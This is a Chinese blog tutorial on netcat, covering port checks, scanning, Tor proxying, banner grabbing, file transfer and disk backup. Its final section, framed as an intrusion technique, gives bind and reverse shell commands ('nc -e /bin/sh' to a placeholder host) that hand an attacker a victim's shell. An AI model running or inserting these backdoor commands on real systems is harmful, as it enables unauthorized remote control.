<!DOCTYPE html>
<html>

  <head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">

<title>netcat使用教程 - 打工笔记</title>
<meta name="description" content="netcat使用教程 @author linjinbao666@gmail.com fork me on github
netcat简介 netcat 一般简称为 nc，直译为中文就是“网猫”，被誉为——【网络上的瑞士军刀】。它诞生于1995年，在网络安全社区的名气很大（就如同 AK47 在军事领域的名气）。长期在安全圈内混的人，应该都知道它。想当年，insecure.org 网站在本世纪初搞过几次“年度投票”，评选优秀的安全工具。每次投票，netcat 都能排进前几名。参考链接
nc命令行简介 形式： nc 命令选项 主机 端口 命令选项 这部分可能包含 0~N 个选项 （注：这部分最复杂，下一个小节单独聊） 主机 这部分可能没有，可能以“点分十进制”形式表示，也可能以“域名”形式表示。 端口 这部分可能没有，可能是单个端口，可能是端口范围（以减号分隔） 举例："/>
<meta name="robots" content="noodp"/>
<link rel="canonical" href="https://amrom66.github.io/2019/2019-09-21-netcat-sample/" />


<meta name="twitter:card" content="summary" />
<meta name="twitter:description" content="netcat使用教程 @author linjinbao666@gmail.com fork me on github
netcat简介 netcat 一般简称为 nc，直译为中文就是“网猫”，被誉为——【网络上的瑞士军刀】。它诞生于1995年，在网络安全社区的名气很大（就如同 AK47 在军事领域的名气）。长期在安全圈内混的人，应该都知道它。想当年，insecure.org 网站在本世纪初搞过几次“年度投票”，评选优秀的安全工具。每次投票，netcat 都能排进前几名。参考链接
nc命令行简介 形式： nc 命令选项 主机 端口 命令选项 这部分可能包含 0~N 个选项 （注：这部分最复杂，下一个小节单独聊） 主机 这部分可能没有，可能以“点分十进制”形式表示，也可能以“域名”形式表示。 端口 这部分可能没有，可能是单个端口，可能是端口范围（以减号分隔） 举例：" />
<meta name="twitter:title" content="netcat使用教程 - 打工笔记" />
<meta name="twitter:site" content="" />
<meta name="twitter:creator" content="" />


<meta property="og:type" content="article" />
<meta content="netcat使用教程 - 打工笔记" property="og:title">
<meta content="netcat使用教程 @author linjinbao666@gmail.com fork me on github
netcat简介 netcat 一般简称为 nc，直译为中文就是“网猫”，被誉为——【网络上的瑞士军刀】。它诞生于1995年，在网络安全社区的名气很大（就如同 AK47 在军事领域的名气）。长期在安全圈内混的人，应该都知道它。想当年，insecure.org 网站在本世纪初搞过几次“年度投票”，评选优秀的安全工具。每次投票，netcat 都能排进前几名。参考链接
nc命令行简介 形式： nc 命令选项 主机 端口 命令选项 这部分可能包含 0~N 个选项 （注：这部分最复杂，下一个小节单独聊） 主机 这部分可能没有，可能以“点分十进制”形式表示，也可能以“域名”形式表示。 端口 这部分可能没有，可能是单个端口，可能是端口范围（以减号分隔） 举例：" property="og:description">
<meta property="og:url" content="https://amrom66.github.io/2019/2019-09-21-netcat-sample/" />
<meta property="og:site_name" content="打工笔记" />
<meta property="article:section" content="信息安全" /><meta property="article:section" content="教程" />
<meta property="article:published_time" content="2019-09-21 00:00:00 &#43;0000 UTC" />





<script type="application/ld+json">
{ 
    "@context": "http://schema.org", 
    "@type": "BlogPosting",
    "headline": "netcat使用教程",
    "genre": "信息安全教程",  
    "url": "https:\/\/amrom66.github.io\/2019\/2019-09-21-netcat-sample\/",
    "datePublished": "2019-09-21 00:00:00 \u002b0000 UTC",
    "description": "netcat使用教程 @author linjinbao666@gmail.com fork me on github\nnetcat简介 netcat 一般简称为 nc，直译为中文就是“网猫”，被誉为——【网络上的瑞士军刀】。它诞生于1995年，在网络安全社区的名气很大（就如同 AK47 在军事领域的名气）。长期在安全圈内混的人，应该都知道它。想当年，insecure.org 网站在本世纪初搞过几次“年度投票”，评选优秀的安全工具。每次投票，netcat 都能排进前几名。参考链接\nnc命令行简介 形式： nc 命令选项 主机 端口 命令选项 这部分可能包含 0~N 个选项 （注：这部分最复杂，下一个小节单独聊） 主机 这部分可能没有，可能以“点分十进制”形式表示，也可能以“域名”形式表示。 端口 这部分可能没有，可能是单个端口，可能是端口范围（以减号分隔） 举例：",
    "author": {
        "@type": "Person",
        "name": ""
    }
 }
</script>




<link rel="stylesheet" href="/sass/main.css">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">

</head>


  <body>

    <header class="site-header">
<nav class="navbar navbar-default">
  <div class="container-fluid">
    
    <div class="navbar-header">
      <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="https://amrom66.github.io">打工笔记</a>
    </div>

    
    <div class="collapse navbar-collapse " id="bs-example-navbar-collapse-1">
            <ul class="nav navbar-nav navbar-right">
        <li><a href="https://amrom66.github.iopages/about/">About</a></li>
        <li><a href="https://amrom66.github.iopages/contact/">Contact</a></li>
        <li class="dropdown">
          <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Download <span class="caret"></span></a>
          <ul class="dropdown-menu">
            <li><a target="_blank" href="https://github.com/bul-ikana/hugo-cards">Project</a></li>
            <li><a href="https://github.com/bul-ikana/hugo-cards.git">Download</a></li>
            <li role="separator" class="divider"></li>
            <li><a target="_blank" href="https://themes.gohugo.io/">More Themes</a></li>
          </ul>
        </li>
      </ul>
    </div>
  </div>
</nav>
</header>


    <div class="container">
      <div class="wrapper">
        
<div class="row">
<div class="col-md-8">
    <article class="post" itemscope itemtype="http://schema.org/BlogPosting">

          <header class="post-header">
            <h1 class="post-title" itemprop="name headline">netcat使用教程</h1>
            <p class="post-meta"><time datetime='2019-09-21T00:00:00Z' itemprop="datePublished">September 21, 2019</time></p>
                 
          </header>

          <div class="post-content" itemprop="articleBody">
            <h2 id="netcat使用教程">netcat使用教程</h2>
<p>@author <a href="mailto:linjinbao666@gmail.com">linjinbao666@gmail.com</a> <a href="https://github.com/linjinbao666">fork me on github</a></p>
<h2 id="netcat简介">netcat简介</h2>
<p>netcat 一般简称为 nc，直译为中文就是“网猫”，被誉为——【<strong>网络上的瑞士军刀</strong>】。它诞生于1995年，在网络安全社区的名气很大（就如同 AK47 在军事领域的名气）。长期在安全圈内混的人，应该都知道它。想当年，insecure.org 网站在本世纪初搞过几次“年度投票”，评选优秀的安全工具。每次投票，netcat 都能排进前几名。<a href="https://en.wikipedia.org/wiki/Netcat">参考链接</a></p>
<h2 id="nc命令行简介">nc命令行简介</h2>
<p>形式： <strong>nc 命令选项 主机 端口</strong> 命令选项 这部分可能包含 0~N 个选项 （注：这部分最复杂，下一个小节单独聊） 主机 这部分可能没有，可能以“点分十进制”形式表示，也可能以“域名”形式表示。 端口 这部分可能没有，可能是单个端口，可能是端口范围（以减号分隔）
举例：</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">nc -l -p 12345 -v
</code></pre></div><p>在这个例子中，分别用到了三个选项（l、v、p），其中 12345 是选项 p 所带的【选项值】</p>
<h2 id="常用的命令行选项">常用的命令行选项</h2>
<table>
<thead>
<tr>
<th style="text-align:left">选项</th>
<th style="text-align:left">是否有选项值</th>
<th style="text-align:right">说明</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:left">h</td>
<td style="text-align:left">NO</td>
<td style="text-align:right">输出 nc 的帮助</td>
</tr>
<tr>
<td style="text-align:left">v</td>
<td style="text-align:left">NO</td>
<td style="text-align:right">在网络通讯时，显示详细的输出信息</td>
</tr>
<tr>
<td style="text-align:left">注：建议新手多用该选项，出错时帮你诊断问题| | n| No| 对命令行中的“主机”，【不】进行域名解析 | | p | YES | 指定“端口号” \</td>
<td></td>
<td></td>
</tr>
<tr>
<td style="text-align:left">命令行合写形式：</td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">nc -lp 12345 -v
nc -l -v -p 12345
nc -lv -p 12345
nc -lvp 12345
</code></pre></div><h2 id="使用场景一网络诊断测试某个远程主机的监听端口是否可达">使用场景一：（网络诊断）测试某个远程主机的【监听】端口是否可达</h2>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">nc -nv x.x.x.x xx
</code></pre></div><div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">[root@localhost netcat]# netcat -nv 172.19.66.61 8080
172.19.66.61 8080 (webcache) open
^CExiting.
[root@localhost netcat]# netcat -nv 172.19.66.61 22
172.19.66.61 22 (ssh) open
SSH-2.0-OpenSSH_6.6.1
^CExiting.
[root@localhost netcat]# 80/epoint-web-zwdt
</code></pre></div><h2 id="使用场景二网络诊断判断防火墙是否允许-or-禁止某个端口">使用场景二：（网络诊断）判断防火墙是否“允许 or 禁止”某个端口</h2>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">nc -lv -p 8080
</code></pre></div><div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">[root@jk-zhengwu01 ~]# nc -lv -p 8080
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: bind to :::8080: Address already in use. QUITTING.
[root@jk-zhengwu01 ~]# clear
[root@jk-zhengwu01 ~]# nc -lv -p 8090
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::8090
Ncat: Listening on 0.0.0.0:8090
Ncat: Connection from 192.168.30.40.
Ncat: Connection from 192.168.30.40:64216.
GET / HTTP/1.1
Host: 172.19.66.60:8090
Connection: keep-alive
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cookie: epoint_local=zh_CN; _theme_=dream; isnormal=1; e596eeb6-5835-4f37-b53c-c56492c4ae16=; f893945b-d030-4007-af87-b7692d468c37=; m=2258:Z3Vlc3Q6Z3Vlc3Q%253D; areacode=110118

[root@jk-zhengwu01 ~]#
</code></pre></div><h2 id="使用场景三渗透测试用-nc-玩端口扫描">使用场景三：（渗透测试）用 nc 玩“端口扫描”</h2>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">netcat -znv x.x.x.x 1-1024
netcat -znv x.x.x.x 1-1024  2&gt;&amp;1 | grep succeeded
</code></pre></div><div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">[root@localhost ~]# nc -nv -w 1 -z 172.19.66.61 1-100
172.19.66.61 22 (ssh) open
^CExiting.
[root@localhost ~]# nc -nv -w 1 -z 172.19.66.61 8080
172.19.66.61 8080 (webcache) open
[root@localhost ~]# nc -nv -w 1 -z 172.19.66.61 22 8080
172.19.66.61 22 (ssh) open
172.19.66.61 8080 (webcache) open
[root@localhost ~]#
</code></pre></div><h2 id="使用场景四隐匿性如何让-nc-走暗网以-tor-为例">使用场景四：（隐匿性）如何让 nc 走暗网（以 Tor 为例）</h2>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">netcat -X 5 -x 127.0.0.1:1080 -v 172.19.66.61 8080
PS：netcat版本不够，不便测试
</code></pre></div><h2 id="使用场景五信息收集用-nc-探测服务器类型和软件版本以-ssh-为例">使用场景五：（信息收集）用 nc 探测“服务器类型”和“软件版本”（以 SSH 为例）</h2>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">echo &#34;EXIT&#34; | nc-tor -vq 5 -n 服务器IP 22
</code></pre></div><div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">[root@localhost ~]# echo &#34;EXIT&#34; | netcat -v ssh.github.com 22
ssh.github.com [192.30.253.122] 22 (ssh) open
SSH-2.0-babeld-dae25663
[root@localhost ~]#
</code></pre></div><h2 id="使用场景六系统管理用-nc-传输文件">使用场景六：（系统管理）用 nc 传输文件</h2>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">接收端：
nc -l -p xxx &gt; file2
发送端：
nc x.x.x.x xxx &lt; file1
</code></pre></div><h2 id="使用场景七系统管理用-nc-远程备份整个磁盘">使用场景七：（系统管理）用 nc 远程备份整个磁盘</h2>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">接收端：
nc -l -p xxx | dd of=/dev/sdb
发送端：
dd if=/dev/sda | nc x.x.x.x xxx
</code></pre></div><h2 id="使用场景八入侵手法用-nc-开启连接型后门">使用场景八：（入侵手法）用 nc 开启连接型后门</h2>
<p>1.被动型</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">被攻击对象：
nc.exe -l -p xxx -e cmd.exe
nc -l -p xxx -e /bin/sh
</code></pre></div><p>2.主动型</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">被攻击对象
nc.exe -e cmd.exe x.x.x.x xxx
nc -e /bin/sh x.x.x.x xxx
</code></pre></div><p>后门创建好之后，攻击者在自己机器上也运行 nc（客户端 nc），然后连接到作为后门的 nc（服务端 nc）。一旦连上之后，攻击者就可以在自己的 nc 上看到对方（受害者机器）的 shell 提示符。</p>

          </div>

    </article>
    <div class="row">
        
    </div>
    
    <div class="row">
            <ul class="pager">
             
                    <li><a class="next" href="https://amrom66.github.io/2019/2019-09-22-155th-weekly-game/">&laquo; 第155场周赛--LeetCode</a></li>
              
              
                <li><a class="previous" href="https://amrom66.github.io/2019/2019-09-13-linux-note/">Linux笔记 &raquo;</a></li>
              
            </ul>
    </div>
</div>


<div class="col-md-4 mt20">
        <div class="post-img">
            
            <img width="600" src="https://amrom66.github.ioimages/wallhaven-q2ypkl.jpg" alt="webjeda">
            
        </div>
            
        
        <div class="mt10 recent">
            <h2>Recent articles</h2>        
             <ul>
                

                      <li>
                      <p><a href="https://amrom66.github.io/2022/2022-08-16-mvn-generate-project/">mvn-generate-project</a><small>&nbsp;&nbsp;August 16, 2022</small></p>
                      </li>

                

                      <li>
                      <p><a href="https://amrom66.github.io/2022/2022-07-14-mysql-1k-columns/">mysql生成宽表脚本</a><small>&nbsp;&nbsp;July 14, 2022</small></p>
                      </li>

                

                      <li>
                      <p><a href="https://amrom66.github.io/2022/2022-06-11-multiple-container-in-one-pod/">multiple-container-in-one-pod</a><small>&nbsp;&nbsp;June 11, 2022</small></p>
                      </li>

                
              </ul>
        </div>
        
        <br>

</div>

</div>




      </div>
    </div>

    <footer>
    <div class="container">
        <div class="row p20">
            

            <div class="col-md-4 text-center mt25" >
                
            </div>
            <div class="col-md-4 text-center mt25">
               
               
               
               
               
            </div>

        </div> 
    </div>
</footer>
    

  <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js"></script>
  <script src="https://amrom66.github.io/js/bootstrap.min.js"></script>
  
  </body>

</html>